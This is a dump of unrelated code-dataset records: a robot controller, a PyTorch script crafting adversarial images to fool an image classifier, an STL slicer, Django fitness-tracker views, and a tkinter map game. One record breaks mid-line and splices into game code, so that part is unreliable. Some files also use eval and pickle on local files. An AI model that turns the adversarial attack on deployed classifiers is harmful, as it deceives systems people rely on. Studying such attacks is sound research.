**kwargs)\n\n def tick(self, sensorData, commands):\n print('Distance reading: {}cm'.format(sensorData.getDistanceSensorReading('so3')))\n print('Encoder reading: {}rad'.format(sensorData.getPositionSensorReading('left wheel sensor')))\n if (sensorData.getTimestamp() % 2) > 1:\n commands.setMotor('left wheel', +self.TURN_SPEED)\n commands.setMotor('right wheel', -self.TURN_SPEED)\n else:\n commands.setMotor('left wheel', -self.TURN_SPEED)\n commands.setMotor('right wheel', +self.TURN_SPEED)\n\n\nif __name__ == '__main__':\n client.Client(Behavior, 'ExampleController').run()\n","sub_path":"client/python/examples/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"127992674","text":"# coding=utf-8\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.autograd.gradcheck import zero_gradients\nfrom torch.utils.data import Dataset, DataLoader\n\nimport torchvision.transforms as T\nfrom torchvision.models.inception import inception_v3\n\nfrom PIL import Image\nfrom scipy.misc import imsave\n\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\n\nimport cv2\n\nclasses = eval(open('classes.txt').read())\ntrans = T.Compose([T.ToTensor(), T.Lambda(lambda t: t.unsqueeze(0))])\nreverse_trans = lambda x: np.asarray(T.ToPILImage()(x))\n\neps = 2 * 8 / 225.\nsteps = 20\nnorm = float('inf')\nstep_alpha = 0.01\n\nmodel = inception_v3(pretrained=True, transform_input=True)\nloss = nn.CrossEntropyLoss()\nmodel.eval()\n\n\ndef load_image(img_path):\n img = trans(Image.open(img_path).convert('RGB'))\n return img\n\n\ndef get_class(img):\n x = Variable(img, volatile=True)\n cls = model(x).data.max(1)[1].cpu().numpy()[0]\n return classes[cls]\n\n\ndef draw_result(img, noise, adv_img, blur_img):\n fig, ax = plt.subplots(1, 4, figsize=(15, 10))\n orig_class, attack_class = get_class(img), get_class(adv_img)\n blur_img_tensor=trans(blur_img)\n blur_class = get_class(blur_img_tensor)\n ax[0].imshow(reverse_trans(img[0]))\n ax[0].set_title('Original image: {}'.format(orig_class.split(',')[0]))\n ax[1].imshow(noise[0].cpu().numpy().transpose(1, 2, 0))\n ax[1].set_title('Attacking noise')\n ax[2].imshow(reverse_trans(adv_img[0]))\n ax[2].set_title('Adversarial example: {}'.format(attack_class))\n ax[3].imshow(reverse_trans(blur_img_tensor[0]))\n ax[3].set_title('blur_img:{}'.format(blur_class))\n for i in range(4):\n ax[i].set_axis_off()\n plt.tight_layout()\n plt.show()\n\n\ndef non_targeted_attack(img):\n img = img\n label = torch.zeros(1, 1)\n\n x, y = Variable(img, requires_grad=True), Variable(label)\n for step in range(steps):\n zero_gradients(x)\n out = model(x)\n y.data = out.data.max(1)[1]\n _loss = loss(out, y)\n _loss.backward()\n normed_grad = step_alpha * torch.sign(x.grad.data)\n step_adv = x.data + normed_grad\n adv = step_adv - img\n adv = torch.clamp(adv, -eps, eps)\n result = img + adv\n result = torch.clamp(result, 0.0, 1.0)\n x.data = result\n return result.cpu(), adv.cpu()\n\n\n# img = load_image('input.png')\n# adv_img, noise = non_targeted_attack(img)\n# draw_result(img, noise, adv_img)\n\n\ndef targeted_attack(img, label):\n img = img\n label = torch.Tensor([label]).long()\n\n x, y = Variable(img, requires_grad=True), Variable(label)\n for step in range(steps):\n zero_gradients(x)\n out = model(x)\n _loss = loss(out, y)\n _loss.backward()\n normed_grad = step_alpha * torch.sign(x.grad.data)\n step_adv = x.data - normed_grad\n adv 
= step_adv - img\n adv = torch.clamp(adv, -eps, eps)\n result = img + adv\n result = torch.clamp(result, 0.0, 1.0)\n x.data = result\n return result.cpu(), adv.cpu()\n\n\ndef blur(image):\n out = cv2.bilateralFilter(image, 9, 75, 75)\n return out\n\nimport numpy\nimg = load_image('input.png')\n# adv_img, noise = targeted_attack(img, 150)\nadv_img, noise = non_targeted_attack(img)\n\nadv_img_PIL = reverse_trans(adv_img[0])\n\nadv_img_CV2 = cv2.cvtColor(numpy.asarray(adv_img_PIL),cv2.COLOR_RGB2BGR)\n\nblur_out_CV2 = blur(adv_img_CV2)\n\n\nblur_out_PIL = Image.fromarray(cv2.cvtColor(blur_out_CV2,cv2.COLOR_BGR2RGB))\n\n# cv2.imshow(\"adv_img\",adv_img_CV2)\n# cv2.imshow(\"blur_out\",blur_out_CV2)\n# cv2.waitKey()\ndraw_result(img, noise, adv_img, blur_out_PIL)\n","sub_path":"1/fff.py","file_name":"fff.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346604924","text":"#!/usr/bin/env python3\r\n\r\nimport math\r\nimport stl\r\nfrom stl import mesh\r\nimport numpy\r\nimport PIL.ImageDraw as ImageDraw\r\nimport PIL.Image as Image\r\nfrom shapely import geometry\r\n\r\n\r\n# THIS SECTION CAN BE MODIFIED MANUALLY BY THE USER ########################\r\n\r\n# importing ths stl file\r\nyour_mesh = mesh.Mesh.from_file('box.stl')\r\nthickness = 1\r\n\r\n# END OF THE SECTION ##############################################\r\n\r\n\r\n# calculating the triangle number in the stl file\r\ntriangle_tuple = your_mesh.points.shape\r\ntriangle_list = list(triangle_tuple)\r\ntriangle_number = triangle_list[0]\r\n\r\n# converting \"numpy nd.array\" type into \"list\" type\r\nbig_list = []\r\nfor k in range(triangle_number):\r\n \r\n b = list(your_mesh[k,:])\r\n big_list = big_list + [b]\r\n \r\n\r\n\r\n# find the max dimensions, so we can know the bounding box, getting the height,\r\n# width, length (because these are the step size)...\r\nminx = maxx = miny = maxy = minz = maxz = None\r\nfor p in your_mesh.points:\r\n # p contains (x, y, z)\r\n if minx is None:\r\n minx = p[stl.Dimension.X]\r\n maxx = p[stl.Dimension.X]\r\n miny = p[stl.Dimension.Y]\r\n maxy = p[stl.Dimension.Y]\r\n minz = p[stl.Dimension.Z]\r\n maxz = p[stl.Dimension.Z]\r\n else:\r\n maxx = max(p[stl.Dimension.X], maxx)\r\n minx = min(p[stl.Dimension.X], minx)\r\n maxy = max(p[stl.Dimension.Y], maxy)\r\n miny = min(p[stl.Dimension.Y], miny)\r\n maxz = max(p[stl.Dimension.Z], maxz)\r\n minz = min(p[stl.Dimension.Z], minz)\r\n\r\n\r\nz_maxx = maxz\r\nz_minn = minz\r\n\r\n# they had to be converted into integer to be used in loops\r\nz_max = int(z_maxx)\r\nz_min = int(z_minn)\r\n\r\n\r\n\r\nmain_list = []\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef slicer(z_val):\r\n # in a specified layer, goes through all the vertices triangle by triangle, see if any of the vertices intersect the cutting plane\r\n # If a vertice intersects the cutting plane, by knowing the z value, x and y coordinates are obtained and appended to the vertices list\r\n # Then those vertices will be connected through a line and the contour will be obtained\r\n # All 5 of the scenarios are gone through and proper one is selected\r\n case = 0\r\n x_y_val = []\r\n cutting_ver = []\r\n sc4_list = []\r\n add_triangle = []\r\n val = 0\r\n for i in big_list:\r\n z_com = [i[2], i[5], i[8]] # a list of z coordinates of the 3 points of the triangle\r\n \r\n \r\n #scenario1:\r\n # no intersection found\r\n if (z_com[0] > z_val and z_com[1] > z_val and z_com[2] > z_val) or \\\r\n (z_com[0] < z_val and 
z_com[1] < z_val and z_com[2] < z_val): \r\n pass\r\n \r\n \r\n \r\n \r\n #scenario2:\r\n # only one of the vertices intersects with the cutting plane\r\n elif (z_com[0] == z_val and z_com[1] != z_val and z_com[2] != z_val) or \\\r\n (z_com[0] != z_val and z_com[1] == z_val and z_com[2] != z_val) or \\\r\n (z_com[0] != z_val and z_com[1] != z_val and z_com[2] == z_val): \r\n pass\r\n \r\n \r\n \r\n #scenario3:\r\n # 2 vertices on the cutting plane. So intersection is a full line. But at the moment we only store the vertices of the line\r\n # \r\n elif (z_com[0] == z_val and z_com[1] == z_val and z_com[2] != z_val ) or (z_com[0] == z_val and z_com[2] == z_val and z_com[1] != z_val) or (z_com[2] == z_val and z_com[1] == z_val and z_com[0] != z_val):\r\n if z_com[0] == z_val and z_com[1] == z_val and z_com[2] != z_val:\r\n var = 3\r\n\r\n elif z_com[0] == z_val and z_com[2] == z_val and z_com[1] != z_val:\r\n var = 2\r\n\r\n else:\r\n var = 1\r\n\r\n z_list = [0,1,2]\r\n new_z_list = z_list\r\n new_z_list.remove(var - 1)\r\n x_y_val.extend((i[new_z_list[0]*3], i[new_z_list[0]*3+1], i[new_z_list[1]*3], i[new_z_list[1]*3+1])) \r\n\r\n\r\n \r\n #scenario4:\r\n # all 3 vertices are on the cutting plane\r\n elif (z_com[0] == z_val and z_com[1] == z_val and z_com[2] == z_val):\r\n pass \r\n\r\n\r\n #scenario5:\r\n ### the detailed exlanation is made in the report with a flow chart and mathemitacal model\r\n \r\n elif (z_com[0] > z_val and z_com[1] < z_val and z_com[2] < z_val) or \\\r\n (z_com[0] < z_val and z_com[1] > z_val and z_com[2] < z_val) or \\\r\n (z_com[0] < z_val and z_com[1] < z_val and z_com[2] > z_val) or \\\r\n (z_com[0] < z_val and z_com[1] > z_val and z_com[2] > z_val) or \\\r\n (z_com[0] > z_val and z_com[1] < z_val and z_com[2] > z_val) or \\\r\n (z_com[0] > z_val and z_com[1] > z_val and z_com[2] < z_val): \r\n \r\n # a new list of the same z coordinates\r\n z_com_new = z_com\r\n # z value of the cutting plane is subrtracted from the each z coordinate, to find out which points will be above the plane\r\n # and which will be below the blane\r\n z_com_new = [ j - z_val for j in z_com_new ] \r\n \r\n # a new list created, and then filled with the positive values(z coordinates over the cutting plance) \r\n pos_neg = []\r\n pos_neg[:] =[x > 0 for x in z_com_new]\r\n \r\n \r\n spn = sum(pos_neg)\r\n \r\n \r\n \r\n if spn == 1:\r\n \r\n single_point_index = pos_neg.index(True)\r\n case = 1 \r\n \r\n \r\n else:\r\n single_point_index = pos_neg.index(False)\r\n case = 2 \r\n \r\n \r\n dummy_list = [0,1,2]\r\n other_dummy_list =dummy_list\r\n other_dummy_list.remove(single_point_index)\r\n \r\n # x, y and z coordinates of the point that is singly above/below the plane\r\n x_1 = i[single_point_index*3]\r\n y_1 = i[single_point_index*3+1]\r\n z_1 = i[single_point_index*3+2]\r\n \r\n # x, y and z coordinates of the other points\r\n x_2 = i[other_dummy_list[0]*3]\r\n y_2 = i[other_dummy_list[0]*3+1]\r\n z_2 = i[other_dummy_list[0]*3+2]\r\n \r\n x_3 = i[other_dummy_list[1]*3]\r\n y_3 = i[other_dummy_list[1]*3+1]\r\n z_3 = i[other_dummy_list[1]*3+2]\r\n \r\n \r\n \r\n # x and y coordinates of the tail and head of the lines\r\n\r\n if case == 1:\r\n\r\n if x_1 == x_2:\r\n x_n_1 = x_1 \r\n else:\r\n x_n_1 = (x_1 - x_2)*(z_val - z_2)/(z_1 - z_2)\r\n if x_n_1 < 0:\r\n x_n_1 = x_n_1 + max(x_2,x_3)\r\n\r\n if y_1 == y_2:\r\n y_n_1 = y_2\r\n else:\r\n y_n_1 = (y_1 - y_2)*(z_val - z_2)/(z_1 - z_2)\r\n if y_n_1 < 0:\r\n y_n_1 = y_n_1 + max(y_2,y_3)\r\n \r\n if x_1 == x_3:\r\n x_n_2 = x_1\r\n else:\r\n 
                    x_n_2 = (x_1 - x_3)*(z_val - z_3)/(z_1 - z_3)\r\n                    if x_n_2 < 0:\r\n                        x_n_2 = x_n_2 + max(x_3,x_2)\r\n\r\n                if y_1 == y_3:\r\n                    y_n_2 = y_1\r\n                else:\r\n                    y_n_2 = (y_1 - y_3)*(z_val - z_3)/(z_1 - z_3)\r\n                    if y_n_2 < 0:\r\n                        y_n_2 = y_n_2 + max(y_3,y_2)\r\n\r\n            elif case == 2:\r\n                if x_1 == x_2:\r\n                    x_n_1 = x_1\r\n                else:\r\n                    x_n_1 = (x_2 - x_1)*(z_val - z_1)/(z_2 - z_1)\r\n                    if x_n_1 < 0:\r\n                        x_n_1 = x_n_1 + max(x_2,x_3)\r\n\r\n                if y_1 == y_2:\r\n                    y_n_1 = y_2\r\n                else:\r\n                    y_n_1 = (y_2 - y_1)*(z_val - z_1)/(z_2 - z_1)\r\n                    if y_n_1 < 0:\r\n                        y_n_1 = y_n_1 + max(y_2,y_3)\r\n\r\n                if x_1 == x_3:\r\n                    x_n_2 = x_1\r\n                else:\r\n                    x_n_2 = (x_3 - x_1)*(z_val - z_1)/(z_3 - z_1)\r\n                    if x_n_2 < 0:\r\n                        x_n_2 = x_n_2 + max(x_3,x_2)\r\n\r\n                if y_1 == y_3:\r\n                    y_n_2 = y_1\r\n                else:\r\n                    y_n_2 = (y_3 - y_1)*(z_val - z_1)/(z_3 - z_1)\r\n                    if y_n_2 < 0:\r\n                        y_n_2 = y_n_2 + max(y_3,y_2)\r\n\r\n            n_1 = [x_n_1, y_n_1]\r\n            n_2 = [x_n_2, y_n_2]\r\n\r\n            x_y_val.extend((x_n_1, y_n_1,x_n_2, y_n_2))\r\n\r\n    return x_y_val\r\n\r\n# as \"for\" can't loop over float values, z_max and z_min are normalized by the thickness so that the increment of the following loop can be 1\r\nthickness_correction = 1 / thickness\r\nz_min_correction = int( z_min * thickness_correction)\r\nz_max_correction = int(z_max * thickness_correction)\r\nz_val = 0\r\n\r\n# for each z value of the cutting plane, which advances by the layer thickness, the slicer function is called and the result is appended to \"main_list\"\r\nfor range_var in range(z_min_correction, z_max_correction+1, 1):\r\n\r\n    main_list = main_list + [slicer(z_val)]\r\n    z_val = z_val + thickness\r\n\r\nprint(main_list,\"main_list\")\r\n\r\n\r\n################################################\r\n\r\n\r\n# we are also close to finishing the conversion of the file into bmp format using a package which also provides variables for resolution, but we ran into some problems\r\n# plotting the file correctly, so that part will be demonstrated in the final report.\r\n","sub_path":"3d_project.py","file_name":"3d_project.py","file_ext":"py","file_size_in_byte":10222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"584748245","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, JsonResponse\nfrom django.contrib import messages\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\n\nfrom .models import *\nfrom .forms import *\nfrom django.db.models import Sum\nfrom django.db.models import Q\n\nimport os\nimport sys\nfrom datetime import date\n\ndef signup(request):\n    if request.method == 'POST':\n        form = SignUpForm(request.POST)\n        if form.is_valid():\n            form.save()\n            username = form.cleaned_data.get('username')\n            raw_password = form.cleaned_data.get('password1')\n            user = authenticate(username=username, password=raw_password)\n            login(request, user)\n            return redirect('/oma-sivuni')\n    else:\n        form = SignUpForm()\n    return render(request, 'signup.html', {'form': form})\n\n@login_required\ndef allJson(request):\n    labels = []\n    data = []\n\n    durationPerExercise = Exercise.objects.values('exercise').annotate(Sum('duration'))\n\n    for e in durationPerExercise:\n        labels.append(e['exercise'])\n        data.append(e['duration__sum'])\n\n    if len(data) > 0:\n        data, labels = zip(*sorted(zip(data, labels)))\n\n    return 
JsonResponse(data={\n        'labels': labels,\n        'data': data,\n    })\n\n@login_required\ndef myJson(request):\n    exercisesInAll = []\n    durationsInAll = []\n    datesInAll = []\n\n    minutes = []\n    dates = []\n\n    durations = []\n    exercises = []\n\n    allExercises = Exercise.objects.filter(person__pk=request.user.pk)\n    durationPerExercise = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(person__pk=request.user.pk)\n    durationAllExercises = Exercise.objects.filter(person__pk=request.user.pk).aggregate(Sum('duration'))\n    minutesInDay = Exercise.objects.values('date').annotate(Sum('duration')).filter(person__pk=request.user.pk)\n\n    for e in allExercises:\n        exercisesInAll.append(e.exercise)\n        durationsInAll.append(e.duration)\n        datesInAll.append(e.date)\n\n    for i in minutesInDay:\n        dates.append(i['date'])\n        minutes.append(i['duration__sum'])\n\n    for e in durationPerExercise:\n        exercises.append(e['exercise'])\n        durations.append(e['duration__sum'])\n\n    return JsonResponse(data={\n        'all': {\n            'exercises': exercisesInAll,\n            'durations': durationsInAll,\n            'dates': datesInAll,\n        },\n        'minutesInDay': {\n            'minutes': minutes,\n            'dates': dates,\n        },\n        'durationPerExercise': {\n            'exercises': exercises,\n            'durations': durations,\n        },\n\n    })\n\ndef charts(request):\n    return render(request, 'charts.html')\n\ndef start(request):\n    return render(request, 'start.html')\n\ndef loggingIn(request):\n    username = request.POST['username']\n    password = request.POST['password']\n    user = authenticate(request, username=username, password=password)\n    if user is not None:\n        login(request, user)\n        return redirect('/oma-sivuni')\n    else:\n        messages.error(request, 'Käyttäjänimeä ei löydy tai salasana on virheellinen. Yritä uudestaan!')\n        return redirect('/kirjaudu')\n\n@login_required\ndef removeChallenge(request, challenge_id):\n    if Challenge.objects.filter(id=challenge_id).exists():\n        challenge = Challenge.objects.get(id=challenge_id)\n        challenge.delete()\n        messages.info(request, 'Haaste poistettiin!')\n    return redirect('/oma-sivuni')\n\ndef logout(request):\n    # alias the auth helper so this view does not call itself recursively\n    from django.contrib.auth import logout as auth_logout\n    auth_logout(request)\n    # Redirect to a success page.\n    return redirect('/')\n\n@login_required\ndef myPage(request):\n    #fetch the challenges the user takes part in\n    challenges = Challenge.objects.filter(challengedBy__pk=request.user.pk) | Challenge.objects.filter(personChallenged__pk=request.user.pk)\n    if len(challenges) > 0:\n        messages.info(request, 'Sinulla on käynnissä olevia haasteita!')\n\n    #the progression lists hold the challenges as dicts keyed by the challenge id,\n    #the summed duration of the exercises matching the challenge, and how much of the challenge is still left to do\n    progression = []\n    progressionOther = []\n    exercisesOther = []\n    employerChallenge = None\n    #fetch the employer challenge that is currently in force:\n    if EmployerChallenge.objects.filter(dateFrom__lte=date.today(), dateTo__gte=date.today()).exists():\n        #add the progress made on the employer challenge to the progression list:\n        employerChallenge = EmployerChallenge.objects.get(dateFrom__lte=date.today(), dateTo__gte=date.today())\n        progressionWithEmployerChallenge = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(exercise=employerChallenge.exercise, date__gte=employerChallenge.dateFrom, date__lte=employerChallenge.dateTo, person__pk=request.user.pk)\n        if len(progressionWithEmployerChallenge) > 0:\n            progression.append({'challenge_id': 'employer-challenge', 'done': progressionWithEmployerChallenge[0]['duration__sum'], 'to_do': employerChallenge.duration - 
progressionWithEmployerChallenge[0]['duration__sum'] })\n            if progressionWithEmployerChallenge[0]['duration__sum']>=employerChallenge.duration and not Completer.objects.filter(person=request.user).exists():\n                messages.success(request, 'Onneksi olkoon! Olet täyttänyt työnantajan asettaman haasteen! Palkintosi on {}!'.format(employerChallenge.carrot))\n                completer = Completer(person=request.user)\n                completer.save()\n                employerChallenge.completers.add(completer)\n\n    for c in challenges:\n        #sum up the durations of the user's own exercises matching this challenge:\n        exercisesOwn = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(exercise=c.exercise, date__gte=c.dateFrom, date__lte=c.dateTo, person__pk=request.user.pk)\n        if c.challengedBy.pk == request.user.pk:\n            #sum up the durations of the challenged person's exercises matching this challenge:\n            exercisesOther = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(exercise=c.exercise, date__gte=c.dateFrom, date__lte=c.dateTo, person__pk=c.personChallenged.pk)\n        else:\n            exercisesOther = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(exercise=c.exercise, date__gte=c.dateFrom, date__lte=c.dateTo, person__pk=c.challengedBy.pk)\n        for e in exercisesOwn:\n            if e['duration__sum']>=c.duration:\n                messages.success(request, 'Onneksi olkoon! Olet täyttänyt haasteen, jonka sinulle antoi {}!'.format(c.challengedBy.first_name))\n            progression.append({'challenge_id':c.id, 'done': e['duration__sum'], 'to_do': c.duration - e['duration__sum'] })\n        for e in exercisesOther:\n            progressionOther.append({'challenge_id':c.id, 'done': e['duration__sum'], 'to_do': c.duration - e['duration__sum'] })\n\n    return render(request, 'my_page.html', {'user': request.user, 'challenges': challenges, 'progression': progression, 'progressionOther': progressionOther, 'employerChallenge': employerChallenge})\n\n@login_required\ndef addExercise(request):\n    if request.method == \"POST\":\n        form = ExerciseForm(request.POST)\n        if form.is_valid():\n            exercise = form.save(commit=False)\n            exercise.person = request.user\n            exercise.save()\n            messages.info(request, 'Suorituksen tallentaminen onnistui!')\n            return redirect('/lisaa-uusi')\n    else:\n        form = ExerciseForm()\n\n    return render(request, 'add_exercise.html', {'form': form })\n\n@login_required\ndef challenge(request):\n    if request.method == \"POST\":\n        form = ChallengeForm(request.POST)\n        if form.is_valid():\n            challenge = form.save(commit=False)\n            challenge.challengedBy = request.user\n            challenge.save()\n            messages.info(request, 'Haaste välitetty!')\n            return redirect('/haasta')\n    else:\n        form = ChallengeForm()\n\n    return render(request, 'challenge.html', {'form': form })\n\n@login_required\ndef secret(request):\n    return HttpResponse(\"Salainen sivu\")","sub_path":"exercises/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"290503282","text":"from functools import lru_cache\nimport sys\nmod=1000000007\n\nn,k=[int(i) for i in input().split(\" \")]\n\nfacts=[1 for i in range(n+k+1)]\n\nfor i in range(1,n+k+1):\n    facts[i]=i*facts[i-1]\n\n@lru_cache()\ndef combination(i,j):\n    return facts[i]//(facts[j]*facts[i-j])\n\nif n= mapSize**2: #if cleaned every tile (mapSize squared)\n        endGame()\n\nclass Recipe: #class for recipes\n    def __init__(self,required,crafted):\n        self.required = required #list of items needed\n        self.crafted = crafted #what is made\n\n    def craft(self): #craft 
the recipe's item\n        tempInv = player.inventory.copy()\n        for requirement in self.required:\n            try:\n                tempInv.remove(requirement)\n            except ValueError: #requirement is not in the copied inventory\n                output(\"You don't have a %s!\"%requirement.name.lower())\n                return #can't craft something if you don't have the requirements\n\n        player.inventory = tempInv.copy()\n\n        output(\"Crafted a \"+self.crafted.name.lower())\n        player.inventory.append(self.crafted) #add the item\n\n    def description(self): #description of the recipe\n        desc = \"To craft the %s you need: \"%self.crafted.name.lower()\n        for requirement in set(self.required): #list each distinct requirement once, with its amount\n            count = self.required.count(requirement)\n            if(count == 1):\n                desc += \"\\n%s\"%requirement.name.lower()\n            else:\n                desc += \"\\n%s x%i\"%(requirement.name.lower(),count)\n        return desc\n\"\"\"\nfunctions\n\"\"\"\ndef output(text): #set output label text to something\n    app.setLabel(\"output\",\"%s\\n%s\"%(app.getLabel(\"output\"),text))\n\ndef loot(): #add a random item to the inventory\n    item = random.choice(items)\n    output(\"You pick up a \"+item.name)\n    player.inventory.append(item)\n\ndef endGame(): #what to do when game finishes\n    app.removeAllWidgets()\n    app.addLabel(\"endText\",\"You've saved the planet!\")\n\n\"\"\"\nsaving/loading functions\n\"\"\"\ndef saveMap(): #save map\n    try:\n        file = open(\"map.txt\",\"wb\")\n        pickle.dump(gameMap, file)\n        file.close()\n    except:\n        output(\"Unable to save map\")\n\ndef saveStats(): #save player stats\n    try:\n        file = open(\"player.txt\",\"wb\")\n        pickle.dump(player,file)\n        file.close()\n    except:\n        output(\"Unable to save player file\")\n\ndef saveAll(): #save everything\n    output(\"Game saved\")\n    saveMap()\n    saveStats()\n\ndef load(): #load player stats and map\n    global gameMap, player\n    try: #don't open files that don't exist\n        file = open(\"map.txt\",\"rb\")\n        gameMap = pickle.load(file)\n        file.close()\n    except: #create a map if no file found (file will be created when it's saved)\n        generateMap()\n\n    try: #don't open files that don't exist\n        file = open(\"player.txt\",\"rb\")\n        player = pickle.load(file)\n        file.close()\n    except: #create player with default stats if no file found (file will be created when it's saved)\n        player = Player(\"Player\",#name\n                        10,#health\n                        5,#damage\n                        0,#armor\n                        [\"slashes\",\"stabs\"],#attack types\n                        round(mapSize/2),#x position\n                        round(mapSize/2),#y position\n                        []#inventory\n                        )\n\n    output(\"Game loaded\")\n    updateMap() #update map at end because player pos might have changed\n\ndef startGame(widget): #do stuff based on button chosen\n    if (widget == \"Continue\"):\n        load()\n\n    elif (widget == \"New Game\"):\n        generateMap()\n\n    #save/load menu, added after game is started so people don't save when nothing is made\n\n    app.addMenuItem(\"File\", \"Save\", func=saveAll)\n    app.addMenuItem(\"File\", \"Load\", func=load)\n\n    app.setTabbedFrameDisableAllTabs(\"main\", disabled=False)\n    app.setTabbedFrameDisabledTab(\"main\", \"combat\", disabled=True)\n    app.hideTabbedFrameTab(\"main\",\"title\")\n    app.setTabbedFrameDisabledTab(\"main\", \"title\", disabled=True)\n\n\n\"\"\"\nmap functions\n\"\"\"\ndef generateMap(): #create new map\n    for y in range(mapSize):\n        gameMap.append([])\n        for x in range(mapSize):\n            gameMap[y].append(random.choice(biomes)) #add a random biome for each tile\n    gameMap[player.posY][player.posX].clean() #'clean' the starting biome\n    updateMap()\n    #saveMap() #save the map once it's generated\n\ndef updateMap(): #clear all the tiles on the map and re-add them\n    app.clearCanvas(\"map\")\n    a = 0\n    for y in gameMap:\n        b=0\n        
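# added note: b tracks the tile's x index and a its y index while the canvas is redrawn\n        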
for x in y:\n name = str(b)+\" \"+str(a) # \"x y\" so we can change the tiles later\n \n map.create_rectangle(b*iconSize, a*iconSize, b*iconSize+iconSize, a*iconSize+iconSize, fill=x.color, width=0, tags=[name]) #x1, y1, x2, y2, color\n map.create_text((b*iconSize)+(iconSize/2), (a*iconSize)+(iconSize/2), text = x.icon, tags=[name])\n b+=1\n a+=1\n \n #create and move to player tile\n map.create_rectangle(player.posX*iconSize, player.posY*iconSize, player.posX*iconSize+iconSize-1, player.posY*iconSize+iconSize-1,fill=player.color,tags=\"player\") \n map.create_text((player.posX*iconSize)+(iconSize/2), (player.posY*iconSize)+(iconSize/2),text = player.icon,tags=\"player\") \n map.xview_moveto((player.posX-5)/(mapSize+2)) #show player position + 5 tiles to the left\n map.yview_moveto((player.posY-5)/(mapSize+2)) #show player position + 5 tiles up \n\ndef updateTile(x,y):\n biome = gameMap[y][x]\n name = str(x)+\" \"+str(y)\n for t in map.find_withtag(name):\n if(map.type(t) == \"rectangle\"):\n map.itemconfig(t,fill=biome.color)\n elif(map.type(t) == \"text\"):\n map.itemconfig(t,text=biome.icon)\n\n\"\"\"\ninput related functions\n\"\"\"\ndef onMove(): #things to do when the player moves\n #move map to where player is\n map.xview_moveto((player.posX-5)/(mapSize+2))\n map.yview_moveto((player.posY-5)/(mapSize+2))\n \n event = random.randint(1,4)\n if(event == 1): #1 in 4 chance of starting combat\n startCombat() \n elif(event == 2):\n loot()\n else:#2 in 4 chance of no event\n pass\n gameMap[player.posY][player.posX].clean() #'clean' the biome once you've done something\n\ndef rebind(): #rebinds the arrow keys because scrolling on the pane messes it up\n app.unbindKeys([\"Left\",\"Right\",\"Up\",\"Down\"])\n app.bindKeys([\"Left\",\"Right\",\"Up\",\"Down\"], keys)\n\ndef keys(key): #what to do whenever a key is pressed\n currentTab = app.getTabbedFrameSelectedTab(\"main\") #find the current tab\n \n if(currentTab == \"map\"): #movement on map\n playerObj = map.find_withtag(\"player\") #get all canvas objects with 'player' tag\n if(key == \"Left\"):\n if(player.posX != 0): #prevent going off the map\n player.posX -= 1\n for p in playerObj:\n map.move(p,-iconSize,0) #move object x, y\n onMove()\n elif(key == \"Right\"):\n if(player.posX != mapSize-1): #prevent going off the map\n player.posX += 1\n for p in playerObj:\n map.move(p,iconSize,0)\n onMove()\n elif(key == \"Up\"):\n if(player.posY != 0): #prevent going off the map\n player.posY -= 1 \n for p in playerObj:\n map.move(p,0,-iconSize)\n onMove()\n elif(key == \"Down\"):\n if(player.posY != mapSize-1): #prevent going off the map\n player.posY += 1\n for p in playerObj:\n map.move(p,0,iconSize)\n onMove()\n \n \n elif(currentTab == \"combat\"): #only work on combat tab\n if(key in [\"a\",\"b\",\"r\"]):#only get attacked when using keys related to combat \n global currentEnemy\n enemyAttacks = (random.random() > 0.5) #50% chance enemy attacks\n if(key == \"a\"):\n damage = max(player.damage - currentEnemy.armor,1) #prevent negative damage\n currentEnemy.health -= damage\n output(player.attackDesc(currentEnemy,damage))\n if(enemyAttacks):\n damage = max(currentEnemy.damage - player.armor,1) #prevent negative damage\n player.health -= damage\n output(currentEnemy.attackDesc(player,damage))\n \n elif(key == \"b\"):\n output(\"You block the %s's attack!\"%currentEnemy.name)\n \n elif(key == \"r\"):\n if(enemyAttacks):\n damage = max(currentEnemy.damage - player.armor,1) #prevent negative damage\n player.health -= damage\n 
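# added note: mirror of the player's strike; the enemy's counter-attack is reported in the log\n                    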
output(currentEnemy.attackDesc(player,damage)) \n else:\n endCombat() #end combat with no winner\n \n \n updateCombat() #update labels to show info\n \n if(player.health <= 0):\n endCombat(\"enemy\")\n elif(currentEnemy.health <= 0):\n endCombat(\"player\") \n #saveStats()\n\n\n\"\"\"\ninventory functions\n\"\"\"\ndef updateInventory(): #add labels for all the items in the player's inventory and what they have equipped\n if(app.getTabbedFrameSelectedTab(\"main\") != \"inventory\"): #dont bother updating inventory labels if not on the tab\n return\n app.openFrame(\"items\")\n app.emptyCurrentContainer()\n for i in player.inventory:\n try: #in case there are multiple of the same item\n app.addLabel(i,i.name)\n app.setLabelTooltip(i, i.description())\n app.setLabelRelief(i,\"raised\")\n app.setLabelSubmitFunction(i, itemSelect) #what to do when label is clicked\n except: #if multiple of the same item set the label to show the amount\n app.setLabel(i,\"%s x%i\"%(i.name,player.inventory.count(i))) #Thing xNum\n app.stopFrame()\n \n \n for slot in player.equipped:\n item = player.equipped[slot]\n if item != None: #make sure it's an actual equipment\n app.setLabel(slot,item.name)\n app.setLabelTooltip(slot, item.description())\n else:#if no item equipped in slot\n app.setLabel(slot,\"Nothing\")\n app.setLabelTooltip(slot, \"\")\n\n\ndef itemSelect(widget): #equip item that is clicked by mouse\n player.equip(widget)\n\n\ndef showRecipe(widget): #change the label to show information on recipe\n app.openFrame(\"craftInfo\")\n app.emptyCurrentContainer()\n app.addLabel(\"craftDesc\",widget.description())\n app.addButton(\"craft\",widget.craft)\n 